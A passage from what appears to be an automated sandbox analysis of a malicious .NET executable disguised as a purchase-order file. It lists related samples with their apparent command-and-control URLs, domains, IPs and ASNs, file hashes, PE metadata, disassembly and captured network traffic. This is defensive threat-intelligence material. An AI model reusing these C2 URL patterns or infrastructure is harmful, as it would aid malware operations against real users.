                                                                                • www.thehairtransplantliaison.com/qqeq/?UR-TRLn=46HGiVXtvGZ1o457vCIWGWOD0rk7gPAg1COzf9/s39+Y4ChpogYwPMQ24i1sYB9XjSps&P6u=Hb9l0TTXQ4NLhX
                                                                                Swift001_jpg.exeGet hashmaliciousBrowse
                                                                                • www.switcheo.finance/o9st/?KtClV=KhNCudCuas36niPBRfSjyKEtMLkkXOZQHLO8g5q+wgMU/BVTe4XuEXQf7/wtYyCblVuW&t8rL=FrghEXS
                                                                                Payment_png.exeGet hashmaliciousBrowse
                                                                                • www.loversdeal.com/c8bs/?oX=Hv8f/9kM6PpCoHCAYeSNySFtV7F8Omi3vFEIW08Kt8pLNhhDl+aE5MaGg51EV/qSy4Lt&sPj0qt=EzuD_nNPa4wlp
                                                                                9tRIEZUd1j.exeGet hashmaliciousBrowse
                                                                                • www.thesixteenthround.net/aqu2/?5j=s0A+R2zrZH16LfLMe9M/AmUzyN8aP2GBLvlZkca4zy1idqDqw+DRrqUwOXi4yQd3lVO7&_P=2dhtaH9
                                                                                Gt8AN6GiOD.exeGet hashmaliciousBrowse
                                                                                • www.boogerstv.com/p2io/?n8Ehjz3=fW2NkW2j278wyrs6d/m+egXTc5dWq8qtohQAL+tQrXSmfdetyJ3HBVVg7gxxicKRFJwM&JtxH=XPs0s4JPf
                                                                                27hKPHrVa3.exeGet hashmaliciousBrowse
                                                                                • www.boogerstv.com/p2io/?RR=YrKhZvg&rp=fW2NkW2j278wyrs6d/m+egXTc5dWq8qtohQAL+tQrXSmfdetyJ3HBVVg7gxxicKRFJwM
                                                                                Payment 9.10000 USD.exeGet hashmaliciousBrowse
                                                                                • www.mondopeak.com/m8es/?dL3pv=B53Wf6M3JDAEan34e2a23JkFEJLcYp8ycOdfYrTy6dbNslo5+k2oC0PjjJDWZV/24+RN&BlL=8pdpXZ1po
                                                                                Fully Executed Contract.xlsxGet hashmaliciousBrowse
                                                                                • www.successandjoy.club/3ueg/?cFN=ErmXmMBIFtdewFC6O29iVXifVtX5lbM9ZC7kz+NOoNf32Keeuvv655T9v66BJ70e0flOVQ==&PBU=dpg8g
                                                                                Inv.exeGet hashmaliciousBrowse
                                                                                • www.a-zsolutionsllc.com/hko6/?NVxxVPJ=eHiVknBCI+BDKnmhqMCE00F5l7UznldHUBBF08pOLsPmMyvxBhFlr4jwGXOfKoyPZ21p&Ch6LF=9rj0axC
                                                                                IMG_7742_Scanned.docGet hashmaliciousBrowse
                                                                                • www.washabsorber.com/gypo/?UrjPuprX=Pn910w3l5D7RPWGrIfEjN0rd6RS+9oh5xbf6ZpHI5T1fuoOy87qGtS6g2RMAOlxWqznzEw==&nnLx=UBZp3XKPefjxdB
                                                                                zMJhFzFNAz.exeGet hashmaliciousBrowse
                                                                                • www.mediasupernova.com/idir/?zZ0lQ0=BBXoJm4OTOHApCp3fGSy0sEyLibn+67cOqzoDset7FTIXfnJGeAyh+7pO3MSwT6mb2mV&Wzr=H2MDx8O8kJn8f
                                                                                InterTech_Inquiry.exeGet hashmaliciousBrowse
                                                                                • www.chelseybalassi.com/pkfa/?UjRXl6T=540ZEXgghc6Opj/C8VvmRqfXW77/Y/lS6uCB1iFiIAmIxFNNfvvrJybl+KB5y+kqtClQ&tVEp=1b60ITOxXh8hrzep
                                                                                00278943.xlsxGet hashmaliciousBrowse
                                                                                • www.coffreauxtissus.com/tmz/?Xrx4qhO=p1AOeEel+iKfzrJrX3ku4fFInusX5uqiRYnKoS72OyvSgvmqycsVhhJV/aISDmeQLKXuHQ==&dny8V=8p-t_j0XJnOLab
                                                                                insz.exeGet hashmaliciousBrowse
                                                                                • www.a-zsolutionsllc.com/hko6/?sDHh4=eHiVknBCI+BDKnmhqMCE00F5l7UznldHUBBF08pOLsPmMyvxBhFlr4jwGXO1VYCPd09p&Wr=M4nHMf1xX
                                                                                Invoice Payment Details.exeGet hashmaliciousBrowse
                                                                                • www.angermgmtathome.com/kio8/?PR-Hfnn=e6NOpdhu6GIIdtRIIRGR8dBI9mtGur58S+UqNMdGsY3OVbM2U6HgcHgaHzLrSTP9HxKs&Cd8t=9rJx809H6RL0Cr7
                                                                                order.exeGet hashmaliciousBrowse
                                                                                • www.a-zsolutionsllc.com/hko6/?X2Mt66Xx=eHiVknBCI+BDKnmhqMCE00F5l7UznldHUBBF08pOLsPmMyvxBhFlr4jwGUiPWZu0eDc4L90DGg==&bly=TVThefOpdDy0
                                                                                Z4bamJ91oo.exeGet hashmaliciousBrowse
                                                                                • www.swavhca.com/jskg/?inKP_TF0=d8LPYq+5Arayfm1vXo3Q9MeTj0bruQyaWpvdMQHKTdQ1FO0+Z34o/nFcLAzU62aITRdq&oneha=xPMpsZU8

                                                                                Domains

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                parkingpage.namecheap.comBetaling_advies.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.218
                                                                                gqnTRCdv5u.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.211
                                                                                eQLPRPErea.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.215
                                                                                PaymentAdvice.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.218
                                                                                DYANAMIC Inquiry.xlsxGet hashmaliciousBrowse
                                                                                • 198.54.117.216
                                                                                Quotation Zhejiang.xlsxGet hashmaliciousBrowse
                                                                                • 198.54.117.215
                                                                                TACA20210407.PDF.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.212
                                                                                46578-TR.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.218
                                                                                ALPHA SCIENCE, INC.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.216
                                                                                SALINAN SWIFT PRA-PEMBAYARAN UNTUK PEMASANGAN.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.217
                                                                                1517679127365.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.216
                                                                                BL-2010403L.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.218
                                                                                Shinshin Machinery.exe.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.212
                                                                                PDF NEW P.OJerhWEMSj4RnE4Z.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.217
                                                                                INV-210318L.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.212
                                                                                Inquiry.docxGet hashmaliciousBrowse
                                                                                • 198.54.117.218
                                                                                BL Draft copy.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.215
                                                                                Order.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.210
                                                                                PO.1183.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.211
                                                                                TSPO0001978-xlxs.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.216

                                                                                ASN

                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                NAMECHEAP-NETUSBetaling_advies.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.218
                                                                                nova narud#U017eba pdf rvP6N.exeGet hashmaliciousBrowse
                                                                                • 63.250.37.200
                                                                                gqnTRCdv5u.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.211
                                                                                Calt7BoW2a.exeGet hashmaliciousBrowse
                                                                                • 63.250.43.5
                                                                                eQLPRPErea.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.215
                                                                                vbc.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.244
                                                                                000OUTQ080519103.pdf.exeGet hashmaliciousBrowse
                                                                                • 198.54.126.159
                                                                                PaymentAdvice.exeGet hashmaliciousBrowse
                                                                                • 198.54.117.218
                                                                                DYANAMIC Inquiry.xlsxGet hashmaliciousBrowse
                                                                                • 198.54.117.216
                                                                                Quotation Zhejiang.xlsxGet hashmaliciousBrowse
                                                                                • 198.54.117.215
                                                                                quotation.exeGet hashmaliciousBrowse
                                                                                • 162.0.229.227
                                                                                PU Request Form Hardware.exeGet hashmaliciousBrowse
                                                                                • 198.54.126.165
                                                                                URGENT INQUIRY.exeGet hashmaliciousBrowse
                                                                                • 198.54.126.165
                                                                                8e29685862fc0d569411c311852d3bb2da2eedb25fc9085a95020b17ddc073a9.xlsGet hashmaliciousBrowse
                                                                                • 63.250.38.60
                                                                                8e29685862fc0d569411c311852d3bb2da2eedb25fc9085a95020b17ddc073a9.xlsGet hashmaliciousBrowse
                                                                                • 63.250.38.60
                                                                                8e29685862fc0d569411c311852d3bb2da2eedb25fc9085a95020b17ddc073a9.xlsGet hashmaliciousBrowse
                                                                                • 63.250.38.60
                                                                                Protected Client.jsGet hashmaliciousBrowse
                                                                                • 199.192.24.250
                                                                                one new parcel.exeGet hashmaliciousBrowse
                                                                                • 199.193.7.228
                                                                                Protected Client.jsGet hashmaliciousBrowse
                                                                                • 199.192.24.250
                                                                                LIHUA Technology HK Order Items.exeGet hashmaliciousBrowse
                                                                                • 198.54.114.191
                                                                                CONFLUENCE-NETWORK-INCVGinvoice.exeGet hashmaliciousBrowse
                                                                                • 208.91.197.91
                                                                                TazxfJHRhq.exeGet hashmaliciousBrowse
                                                                                • 208.91.197.91
                                                                                8sxgohtHjM.exeGet hashmaliciousBrowse
                                                                                • 208.91.197.91
                                                                                PO7321.exeGet hashmaliciousBrowse
                                                                                • 208.91.197.39
                                                                                PRC-20-518 ORIGINAL.xlsxGet hashmaliciousBrowse
                                                                                • 208.91.197.39
                                                                                Lista e porosive te blerjes.exeGet hashmaliciousBrowse
                                                                                • 209.99.64.33
                                                                                BL836477488575.exeGet hashmaliciousBrowse
                                                                                • 204.11.56.48
                                                                                BL84995005038483.exeGet hashmaliciousBrowse
                                                                                • 204.11.56.48
                                                                                DHL Shipping Documents.exeGet hashmaliciousBrowse
                                                                                • 208.91.197.27
                                                                                Formbook.exeGet hashmaliciousBrowse
                                                                                • 204.11.56.48
                                                                                ORIGINAL SHIPPING DOCUMENTSPDF.exeGet hashmaliciousBrowse
                                                                                • 208.91.197.91
                                                                                PDF NEW P.OJerhWEMSj4RnE4Z.exeGet hashmaliciousBrowse
                                                                                • 208.91.197.27
                                                                                bank details.exeGet hashmaliciousBrowse
                                                                                • 208.91.197.27
                                                                                PO#7689.zip.exeGet hashmaliciousBrowse
                                                                                • 208.91.197.91
                                                                                ORDER_PDF.exeGet hashmaliciousBrowse
                                                                                • 209.99.64.18
                                                                                deIt7iuD1y.exeGet hashmaliciousBrowse
                                                                                • 204.11.56.48
                                                                                Bista_094924,ppdf.exeGet hashmaliciousBrowse
                                                                                • 208.91.197.27
                                                                                PO_RFQ007899_PDF.exeGet hashmaliciousBrowse
                                                                                • 209.99.64.55
                                                                                PaymentInvoice.exeGet hashmaliciousBrowse
                                                                                • 208.91.197.39
                                                                                products order pdf.exeGet hashmaliciousBrowse
                                                                                • 208.91.197.91
                                                                                NFORCENLf1uK8cmWpt.dllGet hashmaliciousBrowse
                                                                                • 151.236.29.248
                                                                                JmtlihbjqE.dllGet hashmaliciousBrowse
                                                                                • 151.236.29.248
                                                                                GMLce4kiLh.dllGet hashmaliciousBrowse
                                                                                • 151.236.29.248
                                                                                lbL6XqqqM3.dllGet hashmaliciousBrowse
                                                                                • 151.236.29.248
                                                                                ju3KXnbV9b.dllGet hashmaliciousBrowse
                                                                                • 151.236.29.248
                                                                                ofBzBALmBi.dllGet hashmaliciousBrowse
                                                                                • 151.236.29.248
                                                                                9556305403-04022021.xlsmGet hashmaliciousBrowse
                                                                                • 212.8.251.227
                                                                                9556305403-04022021.xlsmGet hashmaliciousBrowse
                                                                                • 212.8.251.227
                                                                                9556305403-04022021.xlsmGet hashmaliciousBrowse
                                                                                • 212.8.251.227
                                                                                HPxf4UoX7Q.dllGet hashmaliciousBrowse
                                                                                • 151.236.14.53
                                                                                TaTYytHaBk.exeGet hashmaliciousBrowse
                                                                                • 109.201.133.100
                                                                                triage_dropped_file.exeGet hashmaliciousBrowse
                                                                                • 185.107.56.199
                                                                                4TYyYEdhtj.exeGet hashmaliciousBrowse
                                                                                • 185.107.56.199
                                                                                z9HUN5vQSa.exeGet hashmaliciousBrowse
                                                                                • 185.107.56.58
                                                                                vipkSebxBp.exeGet hashmaliciousBrowse
                                                                                • 91.212.150.195
                                                                                sFpD20j0Xq.exeGet hashmaliciousBrowse
                                                                                • 91.212.150.195
                                                                                2HJ7qBzK1k.exeGet hashmaliciousBrowse
                                                                                • 91.212.150.195
                                                                                TJ6N6h5kft.exeGet hashmaliciousBrowse
                                                                                • 91.212.150.195
                                                                                6ed9XIsV3s.exeGet hashmaliciousBrowse
                                                                                • 91.212.150.195
                                                                                aagLWro144.exeGet hashmaliciousBrowse
                                                                                • 91.212.150.195

                                                                                JA3 Fingerprints

                                                                                No context

                                                                                Dropped Files

                                                                                No context

                                                                                Created / dropped Files

                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO-RFQ # 097663899.exe.log
                                                                                Process:C:\Users\user\Desktop\PO-RFQ # 097663899.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):1314
                                                                                Entropy (8bit):5.350128552078965
                                                                                Encrypted:false
                                                                                SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                                                MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                                                SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                                                SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                                                SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                                                Malicious:true
                                                                                Reputation:high, very likely benign file
                                                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                                                                Static File Info

                                                                                General

                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Entropy (8bit):7.8413755633297075
                                                                                TrID:
                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                File name:PO-RFQ # 097663899.exe
                                                                                File size:532480
                                                                                MD5:3a480d8d735efe129dcccea48a054721
                                                                                SHA1:444f3d7795694fb3fd462b6cf3f5c2776e4a1196
                                                                                SHA256:006dcd5baa67723c1d34336ca9d3eb55eb53cdb58999a8c6a3a64b28c2848220
                                                                                SHA512:665f468fd10cab796c277b3d5e9344b00f443f837010deb810e9da0e1265d8d3d997d9e60ae467916a8807818ac0a8c63d9c40d7e5c86c89d43961174c3b68c4
                                                                                SSDEEP:12288:bV7SVAcc+PHH+E1JhJKozcMZi+qEFUOMXR:x7SicLeE1wW+k4
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...V6n`..............P..............2... ...@....@.. ....................................@................................

                                                                                File Icon

                                                                                Icon Hash:00828e8e8686b000

                                                                                Static PE Info

                                                                                General

                                                                                Entrypoint:0x4832d2
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                Time Stamp:0x606E3656 [Wed Apr 7 22:46:46 2021 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:v4.0.30319
                                                                                OS Version Major:4
                                                                                OS Version Minor:0
                                                                                File Version Major:4
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:4
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                Entrypoint Preview

                                                                                Instruction
                                                                                jmp dword ptr [00402000h]
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al

                                                                                Data Directories

                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x832800x4f.text
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x840000x614.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000xc.reloc
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                Sections

                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x20000x812d80x81400False0.901811079545data7.85500503575IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                .rsrc0x840000x6140x800False0.3359375data3.43679274564IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .reloc0x860000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                Resources

                                                                                NameRVASizeTypeLanguageCountry
                                                                                RT_VERSION0x840900x384data
                                                                                RT_MANIFEST0x844240x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                Imports

                                                                                DLLImport
                                                                                mscoree.dll_CorExeMain

                                                                                Version Infos

                                                                                DescriptionData
                                                                                Translation0x0000 0x04b0
                                                                                LegalCopyrightCopyright 2018
                                                                                Assembly Version1.0.0.0
                                                                                InternalNameUrl.exe
                                                                                FileVersion1.0.0.0
                                                                                CompanyNameBobbleSoft
                                                                                LegalTrademarks
                                                                                CommentsConverts one textual format to another.
                                                                                ProductNameFormat Converter
                                                                                ProductVersion1.0.0.0
                                                                                FileDescriptionFormat Converter
                                                                                OriginalFilenameUrl.exe

                                                                                Network Behavior

                                                                                Snort IDS Alerts

                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                04/08/21-13:33:30.395435TCP1201ATTACK-RESPONSES 403 Forbidden804971234.102.136.180192.168.2.5
                                                                                04/08/21-13:33:35.569008TCP1201ATTACK-RESPONSES 403 Forbidden804971334.102.136.180192.168.2.5

                                                                                Network Port Distribution

                                                                                TCP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Apr 8, 2021 13:33:30.258059025 CEST4971280192.168.2.534.102.136.180
                                                                                Apr 8, 2021 13:33:30.270374060 CEST804971234.102.136.180192.168.2.5
                                                                                Apr 8, 2021 13:33:30.270483017 CEST4971280192.168.2.534.102.136.180
                                                                                Apr 8, 2021 13:33:30.270664930 CEST4971280192.168.2.534.102.136.180
                                                                                Apr 8, 2021 13:33:30.282777071 CEST804971234.102.136.180192.168.2.5
                                                                                Apr 8, 2021 13:33:30.395435095 CEST804971234.102.136.180192.168.2.5
                                                                                Apr 8, 2021 13:33:30.395462036 CEST804971234.102.136.180192.168.2.5
                                                                                Apr 8, 2021 13:33:30.395627022 CEST4971280192.168.2.534.102.136.180
                                                                                Apr 8, 2021 13:33:30.395771980 CEST4971280192.168.2.534.102.136.180
                                                                                Apr 8, 2021 13:33:30.410864115 CEST804971234.102.136.180192.168.2.5
                                                                                Apr 8, 2021 13:33:35.441595078 CEST4971380192.168.2.534.102.136.180
                                                                                Apr 8, 2021 13:33:35.454417944 CEST804971334.102.136.180192.168.2.5
                                                                                Apr 8, 2021 13:33:35.454521894 CEST4971380192.168.2.534.102.136.180
                                                                                Apr 8, 2021 13:33:35.454659939 CEST4971380192.168.2.534.102.136.180
                                                                                Apr 8, 2021 13:33:35.467411995 CEST804971334.102.136.180192.168.2.5
                                                                                Apr 8, 2021 13:33:35.569008112 CEST804971334.102.136.180192.168.2.5
                                                                                Apr 8, 2021 13:33:35.569031000 CEST804971334.102.136.180192.168.2.5
                                                                                Apr 8, 2021 13:33:35.569360971 CEST4971380192.168.2.534.102.136.180
                                                                                Apr 8, 2021 13:33:35.569529057 CEST4971380192.168.2.534.102.136.180
                                                                                Apr 8, 2021 13:33:35.582372904 CEST804971334.102.136.180192.168.2.5
                                                                                Apr 8, 2021 13:33:40.936160088 CEST4971680192.168.2.5198.54.117.218
                                                                                Apr 8, 2021 13:33:41.110282898 CEST8049716198.54.117.218192.168.2.5
                                                                                Apr 8, 2021 13:33:41.110400915 CEST4971680192.168.2.5198.54.117.218
                                                                                Apr 8, 2021 13:33:41.110529900 CEST4971680192.168.2.5198.54.117.218
                                                                                Apr 8, 2021 13:33:41.284627914 CEST8049716198.54.117.218192.168.2.5
                                                                                Apr 8, 2021 13:33:41.284666061 CEST8049716198.54.117.218192.168.2.5
                                                                                Apr 8, 2021 13:33:46.447664022 CEST4972280192.168.2.5185.107.56.197
                                                                                Apr 8, 2021 13:33:46.474776030 CEST8049722185.107.56.197192.168.2.5
                                                                                Apr 8, 2021 13:33:46.474947929 CEST4972280192.168.2.5185.107.56.197
                                                                                Apr 8, 2021 13:33:46.475327969 CEST4972280192.168.2.5185.107.56.197
                                                                                Apr 8, 2021 13:33:46.502770901 CEST8049722185.107.56.197192.168.2.5
                                                                                Apr 8, 2021 13:33:46.528913975 CEST8049722185.107.56.197192.168.2.5
                                                                                Apr 8, 2021 13:33:46.529126883 CEST4972280192.168.2.5185.107.56.197
                                                                                Apr 8, 2021 13:33:46.529169083 CEST8049722185.107.56.197192.168.2.5
                                                                                Apr 8, 2021 13:33:46.529215097 CEST4972280192.168.2.5185.107.56.197
                                                                                Apr 8, 2021 13:33:46.561122894 CEST8049722185.107.56.197192.168.2.5
                                                                                Apr 8, 2021 13:33:51.594780922 CEST4972380192.168.2.594.136.40.51
                                                                                Apr 8, 2021 13:33:51.644813061 CEST804972394.136.40.51192.168.2.5
                                                                                Apr 8, 2021 13:33:51.644915104 CEST4972380192.168.2.594.136.40.51
                                                                                Apr 8, 2021 13:33:51.645071030 CEST4972380192.168.2.594.136.40.51
                                                                                Apr 8, 2021 13:33:51.695214033 CEST804972394.136.40.51192.168.2.5
                                                                                Apr 8, 2021 13:33:51.695235968 CEST804972394.136.40.51192.168.2.5
                                                                                Apr 8, 2021 13:33:51.695450068 CEST4972380192.168.2.594.136.40.51
                                                                                Apr 8, 2021 13:33:51.695672035 CEST4972380192.168.2.594.136.40.51
                                                                                Apr 8, 2021 13:33:51.744688988 CEST804972394.136.40.51192.168.2.5
                                                                                Apr 8, 2021 13:34:01.859214067 CEST4972480192.168.2.5103.253.212.249
                                                                                Apr 8, 2021 13:34:02.044053078 CEST8049724103.253.212.249192.168.2.5
                                                                                Apr 8, 2021 13:34:02.044210911 CEST4972480192.168.2.5103.253.212.249
                                                                                Apr 8, 2021 13:34:02.044403076 CEST4972480192.168.2.5103.253.212.249
                                                                                Apr 8, 2021 13:34:02.228183985 CEST8049724103.253.212.249192.168.2.5
                                                                                Apr 8, 2021 13:34:02.446372032 CEST8049724103.253.212.249192.168.2.5
                                                                                Apr 8, 2021 13:34:02.446496964 CEST8049724103.253.212.249192.168.2.5
                                                                                Apr 8, 2021 13:34:02.446574926 CEST4972480192.168.2.5103.253.212.249
                                                                                Apr 8, 2021 13:34:02.446635962 CEST4972480192.168.2.5103.253.212.249
                                                                                Apr 8, 2021 13:34:02.630485058 CEST8049724103.253.212.249192.168.2.5
                                                                                Apr 8, 2021 13:34:23.094430923 CEST4972880192.168.2.5212.237.249.116
                                                                                Apr 8, 2021 13:34:23.127862930 CEST8049728212.237.249.116192.168.2.5
                                                                                Apr 8, 2021 13:34:23.127980947 CEST4972880192.168.2.5212.237.249.116
                                                                                Apr 8, 2021 13:34:23.128309011 CEST4972880192.168.2.5212.237.249.116
                                                                                Apr 8, 2021 13:34:23.162100077 CEST8049728212.237.249.116192.168.2.5
                                                                                Apr 8, 2021 13:34:23.162314892 CEST8049728212.237.249.116192.168.2.5
                                                                                Apr 8, 2021 13:34:23.162336111 CEST8049728212.237.249.116192.168.2.5
                                                                                Apr 8, 2021 13:34:23.162478924 CEST4972880192.168.2.5212.237.249.116
                                                                                Apr 8, 2021 13:34:23.162554026 CEST4972880192.168.2.5212.237.249.116
                                                                                Apr 8, 2021 13:34:23.196173906 CEST8049728212.237.249.116192.168.2.5
                                                                                Apr 8, 2021 13:34:28.200548887 CEST4972980192.168.2.5160.153.136.3
